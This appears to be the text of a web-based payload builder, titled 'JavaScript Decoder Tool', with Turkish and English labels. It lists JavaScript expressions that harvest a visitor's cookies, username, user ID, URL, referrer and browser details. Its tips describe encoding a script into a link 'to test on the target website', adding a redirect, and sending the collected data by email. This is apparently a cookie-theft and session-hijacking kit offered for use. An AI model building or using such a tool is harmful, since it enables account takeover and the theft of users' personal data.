🔓 JavaScript Decoder Tool

📋 Data Listesi

👤 Username:
((u=document.querySelector('.username'))?u.textContent:'no')
🍪 Cookies:
document.cookie
🌐 User Agent:
navigator.userAgent
🌍 Language:
navigator.language
💻 Platform:
navigator.platform
🕐 Timezone:
Intl.DateTimeFormat().resolvedOptions().timeZone
🔗 URL:
location.href
↩️ Referrer:
document.referrer
🆔 User ID:
document.querySelector('a[href*="/user/"]')?.href.match(/\/user\/(\d+)/)?.[1]||'N/A'
🏆 Level:
document.querySelector('.badge').textContent
💡 İpucu: Bu kodları yukarıdaki data alanlarına kopyalayıp yapıştırabilirsiniz!

🔧 Input Configuration

If empty, no redirect will be added to the script

📤 Final Decoded Output

🔒 Final Encoded Output

🔗 Final Full Link

🧪 Test Data Collection

Test the data collection script locally:

💡 Tips

  • All inputs are pre-filled with working values
  • Outputs update automatically when you edit inputs
  • Copy the full link to test on the target website
  • All buttons copy to clipboard for easy use
  • Default script is already tested and working
  • Use "Test Data Collection" to see what data will be collected
  • Use "Send Test Email" to test the email functionality